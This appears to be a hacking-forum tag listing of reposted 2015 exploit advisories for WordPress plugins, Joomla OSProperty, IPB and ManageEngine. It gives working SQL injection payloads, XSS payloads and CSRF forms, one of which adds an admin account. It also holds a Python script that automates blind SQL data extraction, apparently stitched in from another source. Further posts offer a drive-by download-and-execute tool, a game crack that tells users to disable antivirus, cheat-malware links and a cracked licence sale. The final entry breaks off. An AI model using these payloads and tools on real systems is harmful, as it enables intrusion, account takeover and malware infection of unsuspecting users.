Showing results for tags 'version'.

  1. WPTouch (Enterprise Version): a complete mobile solution for WordPress. http://www.wptouch.com/pricing/ ENTERPRISE $349, unlimited supported WordPress sites. The script comes with 1 year of updates; without updates it is lifetime. 100 euro, PayPal/BTC. Awaiting PM.
  2. ------------------------
     ISSUE 1:
     # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
     # Google Dork: N/A
     # Date: 05/05/2015
     # Exploit Author: Felipe Molina de la Torre (@felmoltor)
     # Vendor Homepage: http://freshmail.com/
     # Software Link: https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
     # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
     # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
     # CVE : N/A
     # Category: webapps

     1. Summary
     ------------------
     The Freshmail plugin is an email marketing plugin for WordPress, allowing the administrator to create mail campaigns and keep track of them. There is a SQL injection vulnerability available to collaborators (or higher privileged users) on sites with the Freshmail plugin installed. The SQL injection is located in the attribute "id" of the inserted shortcode [FM_form id="N"]. The shortcode attribute "id" is not sanitized before being inserted into a SQL query. A collaborator can insert shortcodes when editing a new post or page and can preview the results (no administrator approval needed), launching this SQL injection.

     2. Vulnerability timeline
     ----------------------------------
     - 04/05/2015: Identified in version 1.5.8 and contacted the developer company via Twitter.
     - 05/05/2015: Sent the details by mail to the developer.
     - 05/05/2015: Response from the developer.
     - 06/05/2015: Fixed in version 1.6.

     3. Vulnerable code
     ---------------------------
     Vulnerable file: include/shortcode.php, lines 27 and 120:

     Line 19:  function fm_form_func($atts)
     [...]
     Line 27:  $form_value = $wpdb->get_row("select * from ".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
     [...]
     Line 120: add_shortcode('FM_form', 'fm_form_func');

     4. Proof of concept
     ---------------------------
     1. As collaborator, start a new post.
     2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
     3. Click preview.
     4. If the form is shown, the statement is true; if not, false.

     POST /wp-admin/post.php HTTP/1.1
     Host: <web>
     Content-Length: 3979
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Origin: <web>
     User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundary384PE6lRgBcOibkL
     Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.8,es;q=0.6
     Cookie: wordpress_f305[...]

     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="_wpnonce"

     0a75a3666b
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="_wp_http_referer"

     /wp-admin/post.php?post=69&action=edit&message=8
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="user_ID"

     4
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="action"

     editpost
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="originalaction"

     editpost
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_author"

     4
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_type"

     post
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="original_post_status"

     pending
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="referredby"

     http://<web>/wp-admin/post.php?post=69&action=edit&message=8
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="_wp_original_http_referer"

     http://<web>/wp-admin/post.php?post=69&action=edit&message=8
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_ID"

     69
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="meta-box-order-nonce"

     f8aa04e508
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="closedpostboxesnonce"

     ebf65a43ed
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_title"

     Testing SQLi in shortcode
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="samplepermalinknonce"

     e753a2d8f2
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="content"

     [FM_form id='1" and substr(user(),1,1)="b]
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="wp-preview"

     dopreview
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="original_publish"

     Submit for Review
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_format"

     0
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_category[]"

     0
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="post_category[]"

     1
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="tax_input[post_tag]"


     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="newtag[post_tag]"


     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="excerpt"


     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="trackback_url"


     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="metakeyselect"

     #NONE#
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="metakeyinput"


     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="metavalue"


     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="_ajax_nonce-add-meta"

     6a13a5a808
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="advanced_view"

     1
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="comment_status"

     open
     ------WebKitFormBoundary384PE6lRgBcOibkL
     Content-Disposition: form-data; name="ping_status"

     open
     ------WebKitFormBoundary384PE6lRgBcOibkL--

     5. Solution
     ---------------
     Update to version 1.6

     ------------------------
     ISSUE 2:
     # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
     # Google Dork: N/A
     # Date: 05/05/2015
     # Exploit Author: Felipe Molina de la Torre (@felmoltor)
     # Vendor Homepage: http://freshmail.com/
     # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
     # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
     # CVE : N/A
     # Category: webapps

     1. Summary
     ------------------
     The Freshmail plugin is an email marketing plugin for WordPress, allowing the administrator to create mail campaigns and keep track of them. There is an unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" forms shown to web visitors, in the POST parameter fm_form_id.

     2. Vulnerability timeline
     ----------------------------------
     - 04/05/2015: Identified in version 1.5.8 and contacted the developer company via Twitter.
     - 05/05/2015: Sent the details by mail to the developer.
     - 05/05/2015: Response from the developer.
     - 06/05/2015: Fixed in version 1.6.

     3. Vulnerable code
     ---------------------------
     Vulnerable file: include/wp_ajax_fm_form.php, lines 44 and 50

     [...]
     Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
     Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
     [...]
     Line 44: $result = $_POST;
     [...]
     Line 50: $form = $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id="'.$result['fm_form_id'].'";');
     [...]

     4. Proof of concept
     ---------------------------
     POST /wp-admin/admin-ajax.php HTTP/1.1
     Host: <web>
     X-Requested-With: XMLHttpRequest
     [...]
     Cookie: wordpress_f30[...]

     form%5Bemail%5D=fake@fake.com&form%5Bimie%5D=asdf&fm_form_id=1" and "a"="a&action=fm_form&fm_form_referer=%2F

     5. Explanation
     ---------------------
     A page visitor can submit an email (fake@fake.com) to subscribe to the form with fm_form_id="1", and the JSON message received will be similar to:

     {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Your sign up request was successful! Please check your email inbox."}

     The second time they try to do the same with the same email, the message returned will be:

     {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"1","action":"fm_form","fm_form_referer":"\/?p=86","redirect":0,"status":"success","message":"Given email address is already subscribed, thank you!"}

     If we insert 1" and substr(user(),1,1)="a we'll receive either the same message indicating that the given email is already subscribed, indicating that the first character of the username is an "a", or a null message indicating that the first character of the username is not an "a".

     6. Solution
     ---------------
     Update to version 1.6

     Source
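The "already subscribed" vs. empty-reply behaviour described under ISSUE 2 is a boolean oracle, and one yes/no question per request is enough to read out any string the database user can see. The block below is an added example, not code from the advisory, the plugin or the poster: it drives a constructed stand-in for the vulnerable endpoint (in-memory SQLite instead of MySQL, a single-quoted concatenation instead of the plugin's double-quoted form_id="...", and a made-up fm_settings.api_key as the target, all assumptions) and recovers the value with a binary search over the length and over the code point of each character, which needs about seven requests per character instead of the one-guess-per-letter substr(user(),1,1)="a" probing shown above.

```python
import sqlite3

# Constructed stand-in for a site running the vulnerable plugin. Assumptions,
# not taken from the advisory: the backing store is an in-memory SQLite
# database, the concatenated query uses single quotes (the real plugin builds
# `... where form_id="<value>";` on MySQL), and the value we pull out is a
# made-up API key in a made-up fm_settings table.
SECRET_API_KEY = "fm-7Qz9kL"


class MockFreshmailEndpoint:
    """Mimics wp_ajax_nopriv_fm_form: $_POST['fm_form_id'] goes straight into SQL."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(
            "CREATE TABLE fm_forms (form_id TEXT, name TEXT);"
            "INSERT INTO fm_forms VALUES ('1', 'newsletter');"
            "CREATE TABLE fm_settings (api_key TEXT);"
        )
        self.db.execute("INSERT INTO fm_settings VALUES (?)", (SECRET_API_KEY,))
        self.requests = 0

    def subscribe(self, fm_form_id: str) -> bool:
        """True stands for the 'already subscribed' message, False for an empty reply."""
        self.requests += 1
        sql = "select * from fm_forms where form_id='" + fm_form_id + "'"  # vulnerable concatenation
        try:
            return self.db.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False  # a broken query and "no such form" look identical to the visitor


def oracle_true(endpoint: MockFreshmailEndpoint, condition: str) -> bool:
    """One yes/no question: keep the valid form id, AND in the condition, re-close the quote."""
    return endpoint.subscribe("1' and (" + condition + ") and 'a'='a")


def binary_search(endpoint: MockFreshmailEndpoint, lo: int, hi: int, expr: str) -> int:
    """Return the integer value of `expr` (assumed to lie in [lo, hi]) using `expr > mid` questions."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle_true(endpoint, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(endpoint: MockFreshmailEndpoint, subquery: str, max_len: int = 64) -> str:
    """Recover the string returned by `subquery`, one character per binary search."""
    length = binary_search(endpoint, 0, max_len, f"length(({subquery}))")
    chars = []
    for i in range(1, length + 1):
        # printable ASCII 32..126; unicode() yields the code point of the i-th character
        code = binary_search(endpoint, 32, 126, f"unicode(substr(({subquery}), {i}, 1))")
        chars.append(chr(code))
    return "".join(chars)


def demo():
    ep = MockFreshmailEndpoint()
    # The two behaviours the advisory describes: a real id answers, anything else does not.
    assert ep.subscribe("1") and not ep.subscribe("2")
    key = blind_extract(ep, "select api_key from fm_settings")
    return key, ep.requests


if __name__ == "__main__":
    key, n = demo()
    print(f"recovered {key!r} with {n} subscribe requests")
```

Against the real plugin the same loop would swap the single quote for a double quote and `unicode()`/`substr()` for their MySQL equivalents (`ASCII()`/`SUBSTRING()`); the request count, not the payload syntax, is what makes the difference between an afternoon and a minute.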
  3. ================================================================
     CSRF/Stored XSS Vulnerability in Ad Buttons Plugin
     ================================================================

     Overview
     ========
     * Title: CSRF and Stored XSS Vulnerability in Ad Buttons Wordpress Plugin
     * Author: Kaustubh G. Padwad
     * Plugin Homepage: https://wordpress.org/plugins/ad-buttons/
     * Severity: HIGH
     * Version Affected: Version 2.3.1 and mostly prior to it
     * Version Tested: Version 2.3.1
     * Version Patched:

     Description
     ===========

     Vulnerable Parameter
     --------------------
     * 'Your Ad Here' URL

     About Vulnerability
     -------------------
     This plugin is vulnerable to a combined CSRF/XSS attack, meaning that if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, by hijacking the admin's cookies etc.

     Vulnerability Class
     ===================
     Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
     Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

     Steps to Reproduce (POC)
     ========================
     After installing the plugin:
     1. Go to Dashboard --> Ad button --> Setting
     2. Insert this payload
        ## ">><script>+-+-1-+-+alert(document.cookie)</script> ##
        into the above-mentioned vulnerable parameter, save the settings and see the XSS in action.
     3. Visit the Ad Button settings page of this plugin any time later and you can see the script executing, as it is stored.

     The plugin does not use any nonces and hence the same settings can be changed using a CSRF attack; the PoC code for that is below.

     CSRF POC Code
     =============
     <html>
     <body>
     <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=ad-buttons-settings" method="POST">
       <input type="hidden" name="ab_dspcnt" value="1" />
       <input type="hidden" name="ab_title" value="" />
       <input type="hidden" name="ab_target" value="bnk" />
       <input type="hidden" name="ab_powered" value="1" />
       <input type="hidden" name="ab_count" value="1" />
       <input type="hidden" name="ab_yaht" value="pag" />
       <input type="hidden" name="ab_yourad" value="44" />
       <input type="hidden" name="ab_yahurl" value="">><script>+-+-1-+-+alert(6)</script>" />
       <input type="hidden" name="ab_adsense_fixed" value="1" />
       <input type="hidden" name="ab_adsense_pos" value="1" />
       <input type="hidden" name="ab_adsense_pubid" value="pub-" />
       <input type="hidden" name="ab_adsense_channel" value="" />
       <input type="hidden" name="ab_adsense_corners" value="rc:0" />
       <input type="hidden" name="ab_adsense_col_border" value="#" />
       <input type="hidden" name="ab_adsense_col_title" value="#" />
       <input type="hidden" name="ab_adsense_col_bg" value="#" />
       <input type="hidden" name="ab_adsense_col_txt" value="#" />
       <input type="hidden" name="ab_adsense_col_url" value="#" />
       <input type="hidden" name="ab_width" value="<img" />
       <input type="hidden" name="ab_padding" value="<img" />
       <input type="hidden" name="Submit" value="Save Changes" />
       <input type="submit" value="Submit request" />
     </form>
     </body>
     </html>

     Mitigation
     ==========
     Plugin Closed

     Change Log
     ==========
     Plugin Closed

     Disclosure
     ==========
     18-April-2015 Reported to Developer
     Plugin Closed
     8-May-2015 Public

     Credits
     =======
     * Kaustubh Padwad
     * Information Security Researcher
     * kingkaustubh (at) me (dot) com
     * https://twitter.com/s3curityb3ast
     * http://breakthesec.com
     * https://www.linkedin.com/in/kaustubhpadwad

     Source
  4. OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL injection in the country_id parameter of the request made to retrieve a list of states for a given country. The version was not bumped when the vulnerability was fixed, but if you downloaded after April 27th, you downloaded a fixed version.

     http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property
     http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html

     Example URL:
     http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31

     Parameter: country_id (GET)
       Type: UNION query
       Title: MySQL UNION query (NULL) - 2 columns
       Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)#

     -- http://volatile-minds.blogspot.com -- blog
     -- http://www.volatileminds.net -- website
     Source
  5. Readme:
     Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute on the remote PC.
     Step 2.) While still in game.java, change fileDir to the directory on the target computer where you want your application downloaded to.
     Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version. Example:
              "C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java
              This shows my version of the JDK is 1.6.0_16. If you go to 'C:\Program Files\Java\' and see which version of the JDK you have, e.g. 1.6.0_21, you would change the three files so that they read:
              "C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe"
     Step 4.) Run Compile.bat; if no errors show, proceed to step 5.
     Step 5.) Run Make JAR-FILE.bat
     Step 6.) Run 'SIGN YOUR JAR.bat' and, when prompted, enter the password 'java123'. It will not show your typing, but it will be there; after typing 'java123' hit enter.
     Step 7.) Upload yourfile.zip, Client.html and Client.jar to a webhost, then send people to http://yourlink.com/Client.html to execute the drive-by download on them.
     Download
  6. What is IPB (Invision Power Board)? Invision Power Board is forum software designed and made by Invision Power Services. Invision Power Services (IPS) was created in 2002 by Charles Warner and Matt Mecham after they left Jarvis Entertainment Group. It is a forum built on a MySQL database, and Invision Power Board is written in PHP. While Invision Power Board is a commercially sold product, there is a large modding community and many of these modifications are free.

     IPB releases a series of product versions. The first releases of Invision Power Board were available as a free download under a proprietary license. Version 1.3 is mostly used on free forum hosts such as InvisionFree. Since these were released many exploits have been found, and they keep updating and patching them. The second version was exactly like 1.3.1, with the same license, and it was also a free forum host. But after their first update release, version 2.0.1, the free download was replaced with a demo limited to 5000 posts and 1000 threads. Many users were upset with that. Version 3.x was released in 2009. It was a great milestone for the IPB company because of the forum software. The 3.x version released in 2010 was the modified version, as we saw from the modifications made by IPB: search engine optimization and integration with social networking websites like Facebook, Twitter etc.

     Version 3.x was really a great product by IPB until an exploit was found in it, a SQL injection exploit. The vulnerable parameter is in '/interface/ipsconnect/ipsconnect.php'. There is a $_POST parameter vulnerability there.
     POST parameters: act=login&idType=id&id='id here' <-- here is the vulnerable parameter; the $_POST['id'] parameter is vulnerable. It can easily be exploited with error-based SQL injection or blind SQL injection.
     Many exploits have been written for this vulnerability. This is a high-level vulnerability as many sites run on IPB forums.
     Exploit here: Private Paste - Pastie
  7. Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin
     Author: Rohit Kumar
     Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/
     Severity: Medium
     Version Affected: Version 1.215 and mostly prior to it.
     Version Tested: Version 1.215
     Version Patched: 1.215

     Description:
     Vulnerable Parameters
     1. App ID
     2. App Secret
     3. Custom Picture URL
     4. Default Picture URL
     5. URL News Feed Icon

     About Vulnerability
     This plugin is vulnerable to a stored Cross Site Scripting vulnerability. This issue was exploited when a user accessed the Add Link to Facebook settings in WordPress with Administrator privileges. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.

     Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

     Steps to Reproduce:
     After installing the plugin:
     1. Go to Settings -> All in One Facebook
     2. Input this payload in App ID: ><script>alert(1)</script>
     3. Click on the Save button.
     After reloading the page you will see a pop-up box with 1 written in it. Reload the page again to make sure it is stored.

     Change Log
     https://wordpress.org/plugins/add-link-to-facebook/changelog/

     Disclosure
     09th March 2015

     Source: http://packetstorm.wowhacker.com/1504-advisories/wpfacebook-xss.txt
  8. =======================================================================
     title: SQL Injection
     product: WordPress Tune Library Plugin
     vulnerable version: 1.5.4 (and probably below)
     fixed version: 1.5.5
     CVE number: CVE-2015-3314
     impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
     homepage: https://wordpress.org/plugins/tune-library/
     found: 2015-01-09
     by: Hannes Trunde
     mail: hannes.trunde@gmail.com
     twitter: @hannestrunde
     =======================================================================

     Plugin description:
     -------------------
     "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site."
     Source: https://wordpress.org/plugins/tune-library/

     Recommendation:
     ---------------
     The author has provided a fixed plugin version which should be installed immediately.

     Vulnerability overview/description:
     -----------------------------------
     Because of insufficient input validation, a SQL injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability:
     1) The WordPress security feature wp_magic_quotes(), which is enabled by default, has to be disabled.
     2) The plugin-specific option "Filter artists by letter and show alphabetical navigation" has to be enabled.

     Proof of concept:
     -----------------
     The following HTTP request to the Tune Library page returns version, current user and db name:
     ===============================================================================
     http://www.site.com/?page_id=2&artistletter=G' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
     ===============================================================================

     Contact timeline:
     ------------------------
     2015-04-08: Contacting author via mail.
     2015-04-09: Author replies and announces a fix within a week.
     2015-04-12: Mail from author, stating that the plugin has been updated.
     2015-04-14: Requesting CVE via post to the open source software security mailing list: http://openwall.com/lists/oss-security/2015/04/14/5
     2015-04-20: Release of security advisory.

     Solution:
     ---------
     Update to the most recent plugin version.

     Workaround:
     -----------
     Make sure that wp_magic_quotes() is enabled and/or disable the "Filter artists by letter..." option.

     Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt
  9. Requirements: PC, BlueStacks

     Hack features:
     SMARTER LOOT
     ALWAYS ONLINE
     BOOST CAPABLE
     MORE GOLD
     ROYAL POWER
     MULTIPLE DEVICES
     FULLY AUTOMATED

     Instructions:
     In light of the recent posts about Gold Pump not working with certain versions of BlueStacks, I've decided to write a guide on how to figure out what version of BlueStacks you are currently running.
     1. Open BlueStacks. If you are running in window mode you can keep BlueStacks open. If not, exit or minimize BlueStacks.
     2. Locate your task bar, which is at the bottom of your screen.
     3. Click on the little arrow if necessary to show all the applications that are hidden in your tray.
     4. Hover your mouse over the BlueStacks logo and the version number of BlueStacks should show up.
     Please ensure that you have a BlueStacks version of at least 0.9.4.xxxx. If your BlueStacks version is older than 0.9.4.xxxx, you will experience issues with running Gold Pump. Please head over and download BlueStacks: Zippyshare.com - [Tutorial] How To Install BlueStacks & Gold Pump

     Minimum system requirements: Windows XP and a system resolution of 1280 x 768

     NOTE* - DISABLE YOUR ANTIVIRUS // ADD GOLD PUMP AS EXCEPTION
     Antiviruses will flag Gold Pump as a virus. Please disable your antivirus before downloading Gold Pump. Rest assured, Gold Pump is harmless to your system and does not contain any viruses or malware. If you would like to use Gold Pump, please disable your antivirus or add Gold Pump as an exception.

     1. Download BlueStacks - 85 Million Android Users and Counting (bluestack). Click Zippyshare.com - for a zippyshare download link for BlueStacks version 0.9.8.
     2. Install BlueStacks. IMPORTANT - Please ensure your BlueStacks is at least version 9.4.
     3. Open BlueStacks and download Clash of Clans.
     4. Download the crack here: AdF.ly - shrink your URLs and get paid!
     5. Open blueRes.reg to apply the resolution change.
     6. Restart your computer.
     6a. Link your Android account to BlueStacks.
     6b. Link your iOS account to BlueStacks.
     7. Ensure you do not have any troops other than Barbarians and Archers in your camp. Royals and Clan Castle troops are fine.
     8. Place the first Barracks in the rightmost corner of your base. Video tutorial: YouTube
     9. Select the settings that best suit your TH and army capacity.
     10. Press [START PUMPING GOLD].
     Run Gold Pump as admin to remember search requirement / troop capacity / barrack settings.

     Password: leakforums.org
     Credits: leakforums.org
  10. #Cheats for CS 1.6 / CS:GO
      #Works with EAC
      #Works on Steam
      #VAC, all updates
      #Works with all anti-cheat versions
      #Anti-screenshot
      #ESP box

      Download only for analysis, it is malware.
      https://www.sendspace.com/file/vhlt2v
      Download Cubex software [HL1] elementary aimbot version 5.2.rar
  11. ===============================================================================
      CSRF/Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin
      ===============================================================================

      Overview
      ========
      * Title: Stored XSS Vulnerability in AB Google Map Travel (AB-MAP) Wordpress Plugin
      * Author: Kaustubh G. Padwad
      * Plugin Homepage: https://wordpress.org/plugins/ab-google-map-travel/
      * Severity: HIGH
      * Version Affected: Version 3.4 and mostly prior to it
      * Version Tested: Version 3.4
      * Version Patched: 4.0
      * CVE ID: CVE-2015-2755

      Description
      ===========

      Vulnerable Parameter
      --------------------
      * Latitude
      * Longitude
      * Map Width
      * Map Height
      * Map Zoom
      * And all input boxes

      About Vulnerability
      -------------------
      This plugin is vulnerable to a combined CSRF/XSS attack, meaning that if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, by hijacking the admin's cookies etc.

      Vulnerability Class
      ===================
      Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
      Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

      Steps to Reproduce (POC)
      ========================
      After installing the plugin:
      1. Go to Settings -> Google Map Travel
      2. Insert this payload
         ## "> <script>+-+-1-+-+alert(document.cookie)</script> ##
         into any of the above-mentioned vulnerable parameters, save the settings and see the XSS in action.
      3. Visit the Google Map Travel settings page of this plugin any time later and you can see the script executing, as it is stored.

      The plugin does not use any nonces and hence the same settings can be changed using a CSRF attack; the PoC code for that is below.

      <html>
      <body>
      <form action="http://localhost/wordpress/wp-admin/admin.php?page=ab_map_options" method="POST">
        <input type="hidden" name="lat" value=""> <script>+-+-1-+-+alert(document.cookie)</script>" />
        <input type="hidden" name="long" value="76.26730" />
        <input type="hidden" name="lang" value="en" />
        <input type="hidden" name="map_width" value="500" />
        <input type="hidden" name="map_height" value="300" />
        <input type="hidden" name="zoom" value="7" />
        <input type="hidden" name="day_less_five_fare" value="llllll" />
        <input type="hidden" name="day_more_five_fare" value="1.5" />
        <input type="hidden" name="less_five_fare" value="3" />
        <input type="hidden" name="more_five_fare" value="2.5" />
        <input type="hidden" name="curr_format" value="$" />
        <input type="hidden" name="submit" value="Update Settings" />
        <input type="submit" value="Submit request" />
      </form>
      </body>
      </html>

      [image: csrf.jpeg - XSS POC]

      Mitigation
      ==========
      Update to version 4.0

      Change Log
      ==========
      https://wordpress.org/plugins/ab-google-map-travel/changelog/

      Disclosure
      ==========
      07-March-2015 Reported to Developer
      11-March-2015 Reported to Wordpress
      11-March-2015 Acknowledgement from Developer
      16-March-2015 Wordpress reviewed and published the updated plugin.
      16-March-2015 Requested CVE ID
      27-March-2015 CVE Assigned
      28-March-2015 Reposted with CVE ID

      Credits
      =======
      * Kaustubh Padwad
      * Information Security Researcher
      * kingkaustubh@me.com
      * https://twitter.com/s3curityb3ast
      * http://breakthesec.com
      * https://www.linkedin.com/in/kaustubhpadwad

      Source: http://dl.packetstormsecurity.net/1503-exploits/wpabgmt-xssxsrf.txt
  12. ===============================================================================
      CSRF to add admin user Vulnerability In Manage Engine Device Expert
      ===============================================================================

      Overview
      ========
      * Title: CSRF to add admin user Vulnerability In Manage Engine Device Expert
      * Author: Kaustubh G. Padwad
      * Product Homepage: http://www.manageengine.com/products/device-expert/
      * Severity: HIGH
      * Version Affected: Version 5.9.9.0 Build: 5990
      * Version Tested: Version 5.9.9.0 Build: 5990
      * Version Patched: Separate patch release for all versions

      Description
      ===========

      About the Product
      -----------------
      DeviceExpert is a web-based, multi-vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management.

      Vulnerable Parameter
      --------------------
      Create user form

      About Vulnerability
      -------------------
      This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account to the application. This leads to compromise of the whole domain, as the application normally uses a privileged domain account to perform administration tasks.

      Vulnerability Class
      ===================
      Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
      Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

      Steps to Reproduce (POC)
      ========================
      * Add the following code to a web server and send the malicious link to the application admin.
      * The admin should be logged in when they click on the link.
      * Social engineering might help here, for example: "Device password has been changed, click here to reset".

      ####################CSRF Code#######################
      <html>
      <body>
      <form action="https://Server-IP:6060/STATE_ID/1423516534014/CreateUser.ve" method="POST">
        <input type="hidden" name="loginName" value="hackerkaustubh" />
        <input type="hidden" name="password" value="kaustubh" />
        <input type="hidden" name="confirmpass" value="kaustubh" />
        <input type="hidden" name="emailaddress" value="kingkaustubh@me.com" />
        <input type="hidden" name="SEND_EMAIL" value="true" />
        <input type="hidden" name="roles" value="Administrator" />
        <input type="hidden" name="ComponentSelection" value="SpecificDevice" />
        <input type="hidden" name="searchfield" value="--Search Devices--" />
        <input type="hidden" name="DEVICEGROUPSELECTION" value="1" />
        <input type="hidden" name="DeviceGroupDescription" value="This device group contains all the devices present in the inventory" />
        <input type="hidden" name="QUERYID" value="-1" />
        <input type="submit" value="Submit request" />
      </form>
      </body>
      </html>

      Mitigation
      ==========
      Received from the ManageEngine team:
      https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip
      Open DeviceExper.zip
      1. Stop the Device Expert service.
      2. Replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar
      3. Start the Device Expert service.

      Change Log
      ==========

      Disclosure
      ==========
      11-February-2015 Reported to Developer
      13-February-2015 Acknowledgement from Developer
      13-March-2015 Fixed by developer
      16-March-2015 Requested a CVE ID
      21-March-2015 Publicly Disclosed

      Credits
      =======
      * Kaustubh Padwad
      * Information Security Researcher
      * kingkaustubh@me.com
      * https://twitter.com/s3curityb3ast
      * http://breakthesec.com
      * https://www.linkedin.com/in/kaustubhpadwad

      Source
  13. ===============================================================================
Stored XSS Vulnerability In Manage Engine Device Expert
===============================================================================

